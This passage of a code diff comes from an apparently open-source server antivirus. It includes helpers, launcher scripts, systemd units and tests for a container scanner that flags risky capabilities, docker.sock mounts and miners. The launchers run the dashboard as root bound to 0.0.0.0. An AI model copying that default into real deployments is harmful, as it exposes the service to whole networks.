logger.info("Auto-update stopped")
self._auto_update_thread = threading.Thread(
target=_loop, name="ayn-auto-update", daemon=True
)
self._auto_update_thread.start()
def stop_auto_update(self) -> None:
"""Signal the auto-update thread to stop."""
self._auto_update_stop.set()
if self._auto_update_thread:
self._auto_update_thread.join(timeout=5)
# ------------------------------------------------------------------
# Integrity
# ------------------------------------------------------------------
def verify_db_integrity(self) -> Dict[str, Any]:
"""Run ``PRAGMA integrity_check`` on the database.
Returns a dict with ``ok`` (bool) and ``details`` (str).
"""
self.hash_db.initialize()
try:
result = self.hash_db.conn.execute("PRAGMA integrity_check").fetchone()
ok = result[0] == "ok" if result else False
detail = result[0] if result else "no result"
except sqlite3.DatabaseError as exc:
ok = False
detail = str(exc)
status = {"ok": ok, "details": detail}
if not ok:
logger.error("Database integrity check FAILED: %s", detail)
else:
logger.info("Database integrity check passed")
return status
# ------------------------------------------------------------------
# Cleanup
# ------------------------------------------------------------------
def close(self) -> None:
"""Stop background threads and close databases."""
self.stop_auto_update()
self.hash_db.close()
self.ioc_db.close()
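
The routing in `_update_single` reduces to bucketing entries by their `ioc_type` key, which is absent for file hashes. A self-contained sketch with made-up entries:

```python
# Entries without an "ioc_type" key are hash signatures; everything else is
# bucketed by IOC kind, mirroring _update_single above. Sample data is fake.
entries = [
    {"hash": "a" * 64, "threat_name": "Malware.X"},
    {"ioc_type": "ip", "value": "203.0.113.7", "threat_name": "Botnet.C2"},
    {"ioc_type": "url", "value": "http://bad.example/x", "threat_name": "Dropper"},
]
buckets = {"hash": [], "ip": [], "domain": [], "url": []}
for e in entries:
    buckets[e.get("ioc_type") or "hash"].append(e)

counts = {k: len(v) for k, v in buckets.items()}
print(counts)
# → {'hash': 1, 'ip': 1, 'domain': 0, 'url': 1}
```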

View File

@@ -0,0 +1,179 @@
"""General-purpose utility functions for AYN Antivirus."""
from __future__ import annotations
import hashlib
import os
import platform
import re
import socket
import time
import uuid
from datetime import timedelta
from pathlib import Path
from typing import Any, Dict
import psutil
from ayn_antivirus.constants import SCAN_CHUNK_SIZE
# ---------------------------------------------------------------------------
# Human-readable formatting
# ---------------------------------------------------------------------------
def format_size(size_bytes: int | float) -> str:
"""Convert bytes to a human-readable string (e.g. ``"14.2 MB"``)."""
for unit in ("B", "KB", "MB", "GB", "TB"):
if abs(size_bytes) < 1024:
return f"{size_bytes:.1f} {unit}"
size_bytes /= 1024
return f"{size_bytes:.1f} PB"
def format_duration(seconds: float) -> str:
"""Convert seconds to a human-readable duration (e.g. ``"1h 23m 45s"``)."""
if seconds < 0:
return "0s"
td = timedelta(seconds=int(seconds))
parts = []
total_secs = int(td.total_seconds())
hours, rem = divmod(total_secs, 3600)
minutes, secs = divmod(rem, 60)
if hours:
parts.append(f"{hours}h")
if minutes:
parts.append(f"{minutes}m")
parts.append(f"{secs}s")
return " ".join(parts)
# ---------------------------------------------------------------------------
# Privilege check
# ---------------------------------------------------------------------------
def is_root() -> bool:
"""Return ``True`` if the current process is running as root (UID 0)."""
return os.geteuid() == 0
# ---------------------------------------------------------------------------
# System information
# ---------------------------------------------------------------------------
def get_system_info() -> Dict[str, Any]:
"""Collect hostname, OS, kernel, uptime, CPU, and memory details."""
mem = psutil.virtual_memory()
boot = psutil.boot_time()
uptime_secs = time.time() - boot
return {
"hostname": socket.gethostname(),
"os": f"{platform.system()} {platform.release()}",
"os_pretty": platform.platform(),
"kernel": platform.release(),
"architecture": platform.machine(),
"cpu_count": psutil.cpu_count(logical=True),
"cpu_physical": psutil.cpu_count(logical=False),
"cpu_percent": psutil.cpu_percent(interval=0.1),
"memory_total": mem.total,
"memory_total_human": format_size(mem.total),
"memory_available": mem.available,
"memory_available_human": format_size(mem.available),
"memory_percent": mem.percent,
"uptime_seconds": uptime_secs,
"uptime_human": format_duration(uptime_secs),
}
# ---------------------------------------------------------------------------
# Path safety
# ---------------------------------------------------------------------------
def safe_path(path: str | Path) -> Path:
"""Resolve and validate a path.
Expands ``~`` and resolves symlinks and ``..`` components to an
absolute path.
Raises
------
ValueError
If the path is empty or contains null bytes.
"""
s = str(path).strip()
if not s:
raise ValueError("Path must not be empty")
if "\x00" in s:
raise ValueError("Path must not contain null bytes")
resolved = Path(os.path.expanduser(s)).resolve()
return resolved
# ---------------------------------------------------------------------------
# ID generation
# ---------------------------------------------------------------------------
def generate_id() -> str:
"""Return a new UUID4 hex string (32 characters, no hyphens)."""
return uuid.uuid4().hex
# ---------------------------------------------------------------------------
# File hashing
# ---------------------------------------------------------------------------
def hash_file(path: str | Path, algo: str = "sha256") -> str:
"""Return the hex digest of *path* using the specified algorithm.
Reads the file in chunks of :data:`SCAN_CHUNK_SIZE` for efficiency.
Parameters
----------
algo:
Any algorithm accepted by :func:`hashlib.new`.
Raises
------
OSError
If the file cannot be opened or read.
"""
h = hashlib.new(algo)
with open(path, "rb") as fh:
while True:
chunk = fh.read(SCAN_CHUNK_SIZE)
if not chunk:
break
h.update(chunk)
return h.hexdigest()
# ---------------------------------------------------------------------------
# Validation
# ---------------------------------------------------------------------------
# Compiled once at import time.
_IPV4_RE = re.compile(
r"^(?:(?:25[0-5]|2[0-4]\d|[01]?\d\d?)\.){3}"
r"(?:25[0-5]|2[0-4]\d|[01]?\d\d?)$"
)
_DOMAIN_RE = re.compile(
r"^(?:[a-zA-Z0-9](?:[a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?\.)+"
r"[a-zA-Z]{2,}$"
)
def validate_ip(ip: str) -> bool:
"""Return ``True`` if *ip* is a valid IPv4 address."""
return bool(_IPV4_RE.match(ip.strip()))
def validate_domain(domain: str) -> bool:
"""Return ``True`` if *domain* looks like a valid DNS domain name."""
d = domain.strip().rstrip(".")
if len(d) > 253:
return False
return bool(_DOMAIN_RE.match(d))
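
A quick check of `format_size`'s unit-stepping behaviour (the helper's logic is reproduced inline so the snippet runs without the package installed):

```python
def format_size(size_bytes):
    # Same loop as the helper above: divide by 1024 until under one unit.
    for unit in ("B", "KB", "MB", "GB", "TB"):
        if abs(size_bytes) < 1024:
            return f"{size_bytes:.1f} {unit}"
        size_bytes /= 1024
    return f"{size_bytes:.1f} PB"

print(format_size(512))         # → 512.0 B
print(format_size(14_900_000))  # → 14.2 MB
```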

View File

@@ -0,0 +1,101 @@
"""Logging setup for AYN Antivirus.
Provides a one-call ``setup_logging()`` function that configures a
rotating file handler and an optional console handler with consistent
formatting across the entire application.
"""
from __future__ import annotations
import logging
import sys
from logging.handlers import RotatingFileHandler
from pathlib import Path
from ayn_antivirus.constants import DEFAULT_LOG_PATH
# ---------------------------------------------------------------------------
# Format
# ---------------------------------------------------------------------------
_LOG_FORMAT = "[%(asctime)s] %(levelname)s %(name)s: %(message)s"
_DATE_FORMAT = "%Y-%m-%d %H:%M:%S"
# Rotating handler defaults.
_MAX_BYTES = 10 * 1024 * 1024 # 10 MB
_BACKUP_COUNT = 5
def setup_logging(
log_dir: str | Path = DEFAULT_LOG_PATH,
level: int | str = logging.INFO,
console: bool = True,
filename: str = "ayn-antivirus.log",
) -> logging.Logger:
"""Configure the root ``ayn_antivirus`` logger.
Parameters
----------
log_dir:
Directory for the rotating log file. Created automatically.
level:
Logging level (``logging.DEBUG``, ``"INFO"``, etc.).
console:
If ``True``, also emit to stderr.
filename:
Name of the log file inside *log_dir*.
Returns
-------
logging.Logger
The configured ``ayn_antivirus`` logger.
"""
if isinstance(level, str):
level = getattr(logging, level.upper(), logging.INFO)
root = logging.getLogger("ayn_antivirus")
root.setLevel(level)
# Avoid duplicate handlers on repeated calls.
if root.handlers:
return root
formatter = logging.Formatter(_LOG_FORMAT, datefmt=_DATE_FORMAT)
# --- Rotating file handler ---
log_path = Path(log_dir)
try:
log_path.mkdir(parents=True, exist_ok=True)
fh = RotatingFileHandler(
str(log_path / filename),
maxBytes=_MAX_BYTES,
backupCount=_BACKUP_COUNT,
encoding="utf-8",
)
fh.setLevel(level)
fh.setFormatter(formatter)
root.addHandler(fh)
except OSError:
# If we can't write to the log dir, fall back to console only.
pass
# --- Console handler ---
if console:
ch = logging.StreamHandler(sys.stderr)
ch.setLevel(level)
ch.setFormatter(formatter)
root.addHandler(ch)
return root
def get_logger(name: str) -> logging.Logger:
"""Return a child logger under the ``ayn_antivirus`` namespace.
Example::
logger = get_logger("scanners.file")
# → logging.getLogger("ayn_antivirus.scanners.file")
"""
return logging.getLogger(f"ayn_antivirus.{name}")
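
The duplicate-handler guard in `setup_logging` is the detail most worth illustrating: calling setup twice must not double log output. A minimal stdlib-only sketch (the logger name `ayn_demo` is hypothetical):

```python
import logging
import sys

def setup(level: int = logging.INFO) -> logging.Logger:
    log = logging.getLogger("ayn_demo")
    log.setLevel(level)
    if log.handlers:          # already configured: return as-is
        return log
    handler = logging.StreamHandler(sys.stderr)
    handler.setFormatter(
        logging.Formatter("[%(asctime)s] %(levelname)s %(name)s: %(message)s")
    )
    log.addHandler(handler)
    return log

a = setup()
b = setup()  # second call is a no-op thanks to the guard
print(a is b, len(a.handlers))
# → True 1
```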

View File

@@ -0,0 +1,25 @@
#!/bin/bash
# AYN Antivirus Dashboard Launcher (for launchd/systemd)
set -euo pipefail
SCRIPT_DIR="$(cd "$(dirname "$0")/.." && pwd)"
DATA_DIR="${AYN_DATA_DIR:-$HOME/ayn-antivirus-data}"
mkdir -p "$DATA_DIR" "$DATA_DIR/quarantine" "$DATA_DIR/logs"
export PYTHONPATH="$SCRIPT_DIR:${PYTHONPATH:-}"
exec /usr/bin/python3 -c "
import os
data_dir = os.environ.get('AYN_DATA_DIR', os.path.expanduser('~/ayn-antivirus-data'))
os.makedirs(data_dir, exist_ok=True)
from ayn_antivirus.config import Config
from ayn_antivirus.dashboard.server import DashboardServer
c = Config()
c.dashboard_host = '0.0.0.0'
c.dashboard_port = 7777
c.dashboard_db_path = os.path.join(data_dir, 'dashboard.db')
c.db_path = os.path.join(data_dir, 'signatures.db')
c.quarantine_path = os.path.join(data_dir, 'quarantine')
DashboardServer(c).run()
"

View File

@@ -0,0 +1,25 @@
#!/bin/bash
# AYN Antivirus Scanner Daemon Launcher (for launchd/systemd)
set -euo pipefail
SCRIPT_DIR="$(cd "$(dirname "$0")/.." && pwd)"
DATA_DIR="${AYN_DATA_DIR:-$HOME/ayn-antivirus-data}"
mkdir -p "$DATA_DIR" "$DATA_DIR/quarantine" "$DATA_DIR/logs"
export PYTHONPATH="$SCRIPT_DIR:${PYTHONPATH:-}"
exec /usr/bin/python3 -c "
import os
data_dir = os.environ.get('AYN_DATA_DIR', os.path.expanduser('~/ayn-antivirus-data'))
os.makedirs(data_dir, exist_ok=True)
from ayn_antivirus.config import Config
from ayn_antivirus.core.scheduler import Scheduler
c = Config()
c.db_path = os.path.join(data_dir, 'signatures.db')
c.quarantine_path = os.path.join(data_dir, 'quarantine')
s = Scheduler(c)
s.schedule_scan('0 0 * * *', 'full')
s.schedule_update(interval_hours=6)
s.run_daemon()
"

View File

@@ -0,0 +1,20 @@
[Unit]
Description=AYN Antivirus Security Dashboard
After=network-online.target
Wants=network-online.target
Documentation=https://github.com/ayn-antivirus
[Service]
Type=simple
User=root
WorkingDirectory=/opt/ayn-antivirus
ExecStart=/opt/ayn-antivirus/bin/run-dashboard.sh
Restart=always
RestartSec=5
Environment=PYTHONPATH=/opt/ayn-antivirus
Environment=AYN_DATA_DIR=/var/lib/ayn-antivirus
StandardOutput=journal
StandardError=journal
[Install]
WantedBy=multi-user.target

View File

@@ -0,0 +1,20 @@
[Unit]
Description=AYN Antivirus Scanner Daemon
After=network-online.target
Wants=network-online.target
Documentation=https://github.com/ayn-antivirus
[Service]
Type=simple
User=root
WorkingDirectory=/opt/ayn-antivirus
ExecStart=/opt/ayn-antivirus/bin/run-scanner.sh
Restart=always
RestartSec=10
Environment=PYTHONPATH=/opt/ayn-antivirus
Environment=AYN_DATA_DIR=/var/lib/ayn-antivirus
StandardOutput=journal
StandardError=journal
[Install]
WantedBy=multi-user.target

View File

@@ -0,0 +1,45 @@
[build-system]
requires = ["setuptools>=68.0", "wheel"]
build-backend = "setuptools.build_meta"
[project]
name = "ayn-antivirus"
version = "1.0.0"
description = "Comprehensive server antivirus, anti-malware, anti-spyware, and anti-cryptominer tool"
requires-python = ">=3.9"
dependencies = [
"click",
"rich",
"psutil",
"yara-python",
"requests",
"pyyaml",
"schedule",
"watchdog",
"cryptography",
"aiohttp",
"sqlite-utils",
]
[project.scripts]
ayn-antivirus = "ayn_antivirus.cli:main"
[tool.setuptools.packages.find]
include = ["ayn_antivirus*"]
[project.optional-dependencies]
dev = [
"pytest",
"pytest-cov",
"black",
"ruff",
]
[tool.black]
line-length = 100
[tool.ruff]
line-length = 100
[tool.pytest.ini_options]
testpaths = ["tests"]

View File

@@ -0,0 +1,39 @@
#!/bin/bash
# =============================================
# ⚔️ AYN Antivirus — Dashboard Launcher
# =============================================
set -e
cd "$(dirname "$0")"
# Install deps if needed
if ! python3 -c "import aiohttp" 2>/dev/null; then
echo "[*] Installing dependencies..."
pip3 install -e . 2>&1 | tail -3
fi
# Create data dirs
mkdir -p /var/lib/ayn-antivirus /var/log/ayn-antivirus 2>/dev/null || true
# Get server IP
SERVER_IP=$(hostname -I 2>/dev/null | awk '{print $1}' || echo "0.0.0.0")
echo ""
echo " ╔══════════════════════════════════════════╗"
echo " ║ ⚔️ AYN ANTIVIRUS DASHBOARD ║"
echo " ╠══════════════════════════════════════════╣"
echo " ║ 🌐 http://${SERVER_IP}:7777 "
echo " ║ 🔑 API key shown below on first start ║"
echo " ║ Press Ctrl+C to stop ║"
echo " ╚══════════════════════════════════════════╝"
echo ""
exec python3 -c "
from ayn_antivirus.config import Config
from ayn_antivirus.dashboard.server import DashboardServer
config = Config()
config.dashboard_host = '0.0.0.0'
config.dashboard_port = 7777
server = DashboardServer(config)
server.run()
"

View File

View File

@@ -0,0 +1,88 @@
"""Tests for CLI commands using Click CliRunner."""
import pytest
from click.testing import CliRunner
from ayn_antivirus.cli import main
@pytest.fixture
def runner():
return CliRunner()
def test_help(runner):
result = runner.invoke(main, ["--help"])
assert result.exit_code == 0
assert "AYN Antivirus" in result.output or "scan" in result.output
def test_version(runner):
result = runner.invoke(main, ["--version"])
assert result.exit_code == 0
assert "1.0.0" in result.output
def test_scan_help(runner):
result = runner.invoke(main, ["scan", "--help"])
assert result.exit_code == 0
assert "--path" in result.output
def test_scan_containers_help(runner):
result = runner.invoke(main, ["scan-containers", "--help"])
assert result.exit_code == 0
assert "--runtime" in result.output
def test_dashboard_help(runner):
result = runner.invoke(main, ["dashboard", "--help"])
assert result.exit_code == 0
assert "--port" in result.output
def test_status(runner):
result = runner.invoke(main, ["status"])
assert result.exit_code == 0
def test_config_show(runner):
result = runner.invoke(main, ["config", "--show"])
assert result.exit_code == 0
def test_config_set_invalid_key(runner):
result = runner.invoke(main, ["config", "--set", "evil_key", "value"])
assert "Invalid config key" in result.output
def test_quarantine_list(runner):
# May fail with PermissionError on systems without /var/lib/ayn-antivirus
result = runner.invoke(main, ["quarantine", "list"])
# Accept exit code 0 (success) or 1 (permission denied on default path)
assert result.exit_code in (0, 1)
def test_update_help(runner):
result = runner.invoke(main, ["update", "--help"])
assert result.exit_code == 0
def test_fix_help(runner):
result = runner.invoke(main, ["fix", "--help"])
assert result.exit_code == 0
assert "--dry-run" in result.output
def test_report_help(runner):
result = runner.invoke(main, ["report", "--help"])
assert result.exit_code == 0
assert "--format" in result.output
def test_scan_processes_runs(runner):
result = runner.invoke(main, ["scan-processes"])
assert result.exit_code == 0
def test_scan_network_runs(runner):
result = runner.invoke(main, ["scan-network"])
assert result.exit_code == 0

View File

@@ -0,0 +1,88 @@
"""Tests for configuration loading and environment overrides."""
import pytest
from ayn_antivirus.config import Config
from ayn_antivirus.constants import DEFAULT_DASHBOARD_HOST, DEFAULT_DASHBOARD_PORT
def test_default_config():
c = Config()
assert c.dashboard_port == DEFAULT_DASHBOARD_PORT
assert c.dashboard_host == DEFAULT_DASHBOARD_HOST
assert c.auto_quarantine is False
assert c.enable_yara is True
assert c.enable_heuristics is True
assert isinstance(c.scan_paths, list)
assert isinstance(c.exclude_paths, list)
assert isinstance(c.api_keys, dict)
def test_config_env_port_host(monkeypatch):
monkeypatch.setenv("AYN_DASHBOARD_PORT", "9999")
monkeypatch.setenv("AYN_DASHBOARD_HOST", "127.0.0.1")
c = Config()
c._apply_env_overrides()
assert c.dashboard_port == 9999
assert c.dashboard_host == "127.0.0.1"
def test_config_env_auto_quarantine(monkeypatch):
monkeypatch.setenv("AYN_AUTO_QUARANTINE", "true")
c = Config()
c._apply_env_overrides()
assert c.auto_quarantine is True
def test_config_scan_path_env(monkeypatch):
monkeypatch.setenv("AYN_SCAN_PATH", "/tmp,/var")
c = Config()
c._apply_env_overrides()
assert "/tmp" in c.scan_paths
assert "/var" in c.scan_paths
def test_config_max_file_size_env(monkeypatch):
monkeypatch.setenv("AYN_MAX_FILE_SIZE", "12345")
c = Config()
c._apply_env_overrides()
assert c.max_file_size == 12345
def test_config_load_missing_file():
"""Loading from non-existent file returns defaults."""
c = Config.load("/nonexistent/path/config.yaml")
assert c.dashboard_port == DEFAULT_DASHBOARD_PORT
assert isinstance(c.scan_paths, list)
def test_config_load_yaml(tmp_path):
"""Loading a valid YAML config file picks up values."""
cfg_file = tmp_path / "config.yaml"
cfg_file.write_text(
"scan_paths:\n - /opt\nauto_quarantine: true\ndashboard_port: 8888\n"
)
c = Config.load(str(cfg_file))
assert c.scan_paths == ["/opt"]
assert c.auto_quarantine is True
assert c.dashboard_port == 8888
def test_config_env_overrides_yaml(tmp_path, monkeypatch):
"""Environment variables take precedence over YAML."""
cfg_file = tmp_path / "config.yaml"
cfg_file.write_text("dashboard_port: 1111\n")
monkeypatch.setenv("AYN_DASHBOARD_PORT", "2222")
c = Config.load(str(cfg_file))
assert c.dashboard_port == 2222
def test_all_fields_accessible():
"""Every expected config attribute exists."""
c = Config()
for attr in [
"scan_paths", "exclude_paths", "quarantine_path", "db_path",
"log_path", "auto_quarantine", "scan_schedule", "max_file_size",
"enable_yara", "enable_heuristics", "enable_realtime_monitor",
"dashboard_host", "dashboard_port", "dashboard_db_path", "api_keys",
]:
assert hasattr(c, attr), f"Missing config attribute: {attr}"
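
The precedence rule those last tests pin down (environment beats YAML) can be sketched without the `Config` class; the variable name mirrors the real `AYN_DASHBOARD_PORT` override:

```python
import os

def resolve_port(yaml_value: int) -> int:
    # The env var, when set, wins over the file-provided value.
    raw = os.environ.get("AYN_DASHBOARD_PORT")
    return int(raw) if raw is not None else yaml_value

os.environ["AYN_DASHBOARD_PORT"] = "2222"
overridden = resolve_port(1111)
del os.environ["AYN_DASHBOARD_PORT"]
fallback = resolve_port(1111)
print(overridden, fallback)  # → 2222 1111
```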

View File

@@ -0,0 +1,405 @@
"""Tests for the container scanner module."""
from __future__ import annotations
import json
from unittest.mock import patch
import pytest
from ayn_antivirus.scanners.container_scanner import (
ContainerInfo,
ContainerScanResult,
ContainerScanner,
ContainerThreat,
)
# ---------------------------------------------------------------------------
# Data class tests
# ---------------------------------------------------------------------------
class TestContainerInfo:
def test_defaults(self):
ci = ContainerInfo(
container_id="abc", name="web", image="nginx",
status="running", runtime="docker", created="2026-01-01",
)
assert ci.ports == []
assert ci.mounts == []
assert ci.pid == 0
assert ci.ip_address == ""
assert ci.labels == {}
def test_to_dict(self):
ci = ContainerInfo(
container_id="abc", name="web", image="nginx:1.25",
status="running", runtime="docker", created="2026-01-01",
ports=["80:80"], mounts=["/data"], pid=42,
ip_address="10.0.0.2", labels={"env": "prod"},
)
d = ci.to_dict()
assert d["container_id"] == "abc"
assert d["ports"] == ["80:80"]
assert d["labels"] == {"env": "prod"}
class TestContainerThreat:
def test_to_dict(self):
ct = ContainerThreat(
container_id="abc", container_name="web", runtime="docker",
threat_name="Miner.X", threat_type="miner",
severity="CRITICAL", details="found xmrig",
)
d = ct.to_dict()
assert d["threat_name"] == "Miner.X"
assert d["severity"] == "CRITICAL"
assert len(d["timestamp"]) == 19
def test_optional_fields(self):
ct = ContainerThreat(
container_id="x", container_name="y", runtime="podman",
threat_name="T", threat_type="malware", severity="HIGH",
details="d", file_path="/tmp/bad", process_name="evil",
)
d = ct.to_dict()
assert d["file_path"] == "/tmp/bad"
assert d["process_name"] == "evil"
class TestContainerScanResult:
def test_empty_is_clean(self):
r = ContainerScanResult(scan_id="t", start_time="2026-01-01 00:00:00")
assert r.is_clean is True
assert r.duration_seconds == 0.0
def test_with_threats(self):
ct = ContainerThreat(
container_id="a", container_name="b", runtime="docker",
threat_name="T", threat_type="miner", severity="HIGH",
details="d",
)
r = ContainerScanResult(
scan_id="t",
start_time="2026-01-01 00:00:00",
end_time="2026-01-01 00:00:10",
threats=[ct],
)
assert r.is_clean is False
assert r.duration_seconds == 10.0
def test_to_dict(self):
r = ContainerScanResult(
scan_id="t",
start_time="2026-01-01 00:00:00",
end_time="2026-01-01 00:00:03",
containers_found=2,
containers_scanned=1,
errors=["oops"],
)
d = r.to_dict()
assert d["threats_found"] == 0
assert d["duration_seconds"] == 3.0
assert d["errors"] == ["oops"]
# ---------------------------------------------------------------------------
# Scanner tests
# ---------------------------------------------------------------------------
class TestContainerScanner:
def test_properties(self):
s = ContainerScanner()
assert s.name == "container_scanner"
assert "Docker" in s.description
assert isinstance(s.available_runtimes, list)
def test_no_runtimes_graceful(self):
"""With no runtimes installed scan returns an error, not an exception."""
s = ContainerScanner()
s._available_runtimes = []
s._docker_cmd = None
s._podman_cmd = None
s._lxc_cmd = None
r = s.scan("all")
assert isinstance(r, ContainerScanResult)
assert r.containers_found == 0
assert len(r.errors) == 1
assert "No container runtimes" in r.errors[0]
def test_scan_returns_result(self):
s = ContainerScanner()
r = s.scan("all")
assert isinstance(r, ContainerScanResult)
assert r.scan_id
assert r.start_time
assert r.end_time
def test_scan_container_delegates(self):
s = ContainerScanner()
s._available_runtimes = []
r = s.scan_container("some-id")
assert isinstance(r, ContainerScanResult)
def test_run_cmd_timeout(self):
_, stderr, rc = ContainerScanner._run_cmd(["sleep", "10"], timeout=1)
assert rc == -1
assert "timed out" in stderr.lower()
def test_run_cmd_not_found(self):
_, stderr, rc = ContainerScanner._run_cmd(
["this_command_does_not_exist_xyz"],
)
assert rc == -1
assert "not found" in stderr.lower() or "No such file" in stderr
def test_find_command(self):
# python3 should exist everywhere
assert ContainerScanner._find_command("python3") is not None
assert ContainerScanner._find_command("no_such_binary_xyz") is None
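The `_run_cmd` error-handling contract exercised above (timeouts and missing binaries both map to `rc == -1` with a descriptive stderr) can be satisfied by a small `subprocess` wrapper. This is a sketch of that contract, not necessarily the project's implementation:

```python
import subprocess

def run_cmd(cmd, timeout=30):
    """Run a command, mapping timeouts and missing binaries to rc == -1."""
    try:
        proc = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
        return proc.stdout, proc.stderr, proc.returncode
    except subprocess.TimeoutExpired:
        return "", f"command timed out after {timeout}s", -1
    except FileNotFoundError as exc:
        return "", f"command not found: {exc}", -1
```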
# ---------------------------------------------------------------------------
# Mock-based integration tests
# ---------------------------------------------------------------------------
class TestDockerParsing:
"""Test Docker output parsing with mocked subprocess calls."""
def _make_scanner(self):
s = ContainerScanner()
s._docker_cmd = "/usr/bin/docker"
s._available_runtimes = ["docker"]
return s
def test_list_docker_parses_output(self):
ps_output = (
"abc123456789\tweb\tnginx:1.25\tUp 2 hours\t"
"2026-01-01 00:00:00\t0.0.0.0:80->80/tcp"
)
inspect_output = json.dumps([{
"State": {"Pid": 42},
"NetworkSettings": {"Networks": {"bridge": {"IPAddress": "172.17.0.2"}}},
"Mounts": [{"Source": "/data"}],
"Config": {"Labels": {"app": "web"}},
}])
s = self._make_scanner()
with patch.object(s, "_run_cmd") as mock_run:
mock_run.side_effect = [
(ps_output, "", 0), # docker ps
(inspect_output, "", 0), # docker inspect
]
containers = s._list_docker()
assert len(containers) == 1
c = containers[0]
assert c.name == "web"
assert c.image == "nginx:1.25"
assert c.status == "running"
assert c.runtime == "docker"
assert c.pid == 42
assert c.ip_address == "172.17.0.2"
assert "/data" in c.mounts
assert c.labels == {"app": "web"}
def test_list_docker_ps_failure(self):
s = self._make_scanner()
with patch.object(s, "_run_cmd", return_value=("", "error", 1)):
assert s._list_docker() == []
def test_inspect_docker_bad_json(self):
s = self._make_scanner()
with patch.object(s, "_run_cmd", return_value=("not json", "", 0)):
assert s._inspect_docker("abc") == {}
class TestPodmanParsing:
def test_list_podman_parses_json(self):
s = ContainerScanner()
s._podman_cmd = "/usr/bin/podman"
s._available_runtimes = ["podman"]
podman_output = json.dumps([{
"Id": "def456789012abcdef",
"Names": ["db"],
"Image": "postgres:16",
"State": "running",
"Created": "2026-01-01",
"Ports": [{"hostPort": 5432, "containerPort": 5432}],
"Pid": 99,
"Labels": {},
}])
with patch.object(s, "_run_cmd", return_value=(podman_output, "", 0)):
containers = s._list_podman()
assert len(containers) == 1
assert containers[0].name == "db"
assert containers[0].runtime == "podman"
assert containers[0].pid == 99
class TestLXCParsing:
def test_list_lxc_parses_output(self):
s = ContainerScanner()
s._lxc_cmd = "/usr/bin/lxc-ls"
s._available_runtimes = ["lxc"]
lxc_output = "NAME STATE IPV4 PID\ntest1 RUNNING 10.0.3.5 1234"
with patch.object(s, "_run_cmd", return_value=(lxc_output, "", 0)):
containers = s._list_lxc()
assert len(containers) == 1
assert containers[0].name == "test1"
assert containers[0].status == "running"
assert containers[0].ip_address == "10.0.3.5"
assert containers[0].pid == 1234
class TestMisconfigDetection:
"""Test misconfiguration detection with mocked inspect output."""
def _scan_misconfig(self, inspect_data):
s = ContainerScanner()
s._docker_cmd = "/usr/bin/docker"
ci = ContainerInfo(
container_id="abc", name="test", image="img",
status="running", runtime="docker", created="",
)
with patch.object(s, "_run_cmd", return_value=(json.dumps([inspect_data]), "", 0)):
return s._check_misconfigurations(ci)
def test_privileged_mode(self):
threats = self._scan_misconfig({
"HostConfig": {"Privileged": True},
"Config": {"User": "app"},
})
names = [t.threat_name for t in threats]
assert "PrivilegedMode.Container" in names
def test_root_user(self):
threats = self._scan_misconfig({
"HostConfig": {},
"Config": {"User": ""},
})
names = [t.threat_name for t in threats]
assert "RunAsRoot.Container" in names
def test_host_network(self):
threats = self._scan_misconfig({
"HostConfig": {"NetworkMode": "host"},
"Config": {"User": "app"},
})
names = [t.threat_name for t in threats]
assert "HostNetwork.Container" in names
def test_host_pid(self):
threats = self._scan_misconfig({
"HostConfig": {"PidMode": "host"},
"Config": {"User": "app"},
})
names = [t.threat_name for t in threats]
assert "HostPID.Container" in names
def test_dangerous_caps(self):
threats = self._scan_misconfig({
"HostConfig": {"CapAdd": ["SYS_ADMIN", "NET_RAW"]},
"Config": {"User": "app"},
})
names = [t.threat_name for t in threats]
assert "DangerousCap.Container.SYS_ADMIN" in names
assert "DangerousCap.Container.NET_RAW" in names
def test_sensitive_mount(self):
threats = self._scan_misconfig({
"HostConfig": {},
"Config": {"User": "app"},
"Mounts": [{"Source": "/var/run/docker.sock", "Destination": "/var/run/docker.sock"}],
})
names = [t.threat_name for t in threats]
assert "SensitiveMount.Container" in names
def test_no_resource_limits(self):
threats = self._scan_misconfig({
"HostConfig": {"Memory": 0, "CpuQuota": 0},
"Config": {"User": "app"},
})
names = [t.threat_name for t in threats]
assert "NoResourceLimits.Container" in names
def test_security_disabled(self):
threats = self._scan_misconfig({
"HostConfig": {"SecurityOpt": ["seccomp=unconfined"]},
"Config": {"User": "app"},
})
names = [t.threat_name for t in threats]
assert "SecurityDisabled.Container" in names
def test_clean_config(self):
threats = self._scan_misconfig({
"HostConfig": {"Memory": 512000000, "CpuQuota": 50000},
"Config": {"User": "app"},
})
# Should have no misconfig threats
assert len(threats) == 0
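Taken together, the misconfiguration tests above fully specify the rule set. A standalone sketch of those rules (the helper name and the exact capability/mount lists are assumptions, not the shipped detector):

```python
def misconfig_threats(inspect: dict) -> list[str]:
    """Map a docker-inspect dict to the threat names the tests expect."""
    host = inspect.get("HostConfig", {})
    cfg = inspect.get("Config", {})
    threats = []
    if host.get("Privileged"):
        threats.append("PrivilegedMode.Container")
    if not cfg.get("User"):                       # empty user means root
        threats.append("RunAsRoot.Container")
    if host.get("NetworkMode") == "host":
        threats.append("HostNetwork.Container")
    if host.get("PidMode") == "host":
        threats.append("HostPID.Container")
    for cap in host.get("CapAdd") or []:
        if cap in {"SYS_ADMIN", "SYS_PTRACE", "NET_RAW", "NET_ADMIN"}:
            threats.append(f"DangerousCap.Container.{cap}")
    for m in inspect.get("Mounts", []):
        if m.get("Source", "").startswith(("/var/run/docker.sock", "/proc", "/etc")):
            threats.append("SensitiveMount.Container")
    if host.get("Memory", 0) == 0 and host.get("CpuQuota", 0) == 0:
        threats.append("NoResourceLimits.Container")
    if any("unconfined" in opt for opt in host.get("SecurityOpt") or []):
        threats.append("SecurityDisabled.Container")
    return threats
```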
class TestImageCheck:
def test_latest_tag(self):
ci = ContainerInfo(
container_id="a", name="b", image="nginx:latest",
status="running", runtime="docker", created="",
)
threats = ContainerScanner._check_image(ci)
assert any("LatestTag" in t.threat_name for t in threats)
def test_no_tag(self):
ci = ContainerInfo(
container_id="a", name="b", image="nginx",
status="running", runtime="docker", created="",
)
threats = ContainerScanner._check_image(ci)
assert any("LatestTag" in t.threat_name for t in threats)
def test_pinned_tag(self):
ci = ContainerInfo(
container_id="a", name="b", image="nginx:1.25.3",
status="running", runtime="docker", created="",
)
threats = ContainerScanner._check_image(ci)
assert len(threats) == 0
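The image checks above pin down the tagging policy: an explicit `:latest` tag or a missing tag is flagged, a pinned version is clean. One way that rule could look as a standalone helper (a hypothetical sketch, not the project's `_check_image`; digests are ignored):

```python
def flag_unpinned_image(image: str) -> list[str]:
    """Return threat names for images not pinned to a version tag."""
    name, sep, tag = image.rpartition(":")
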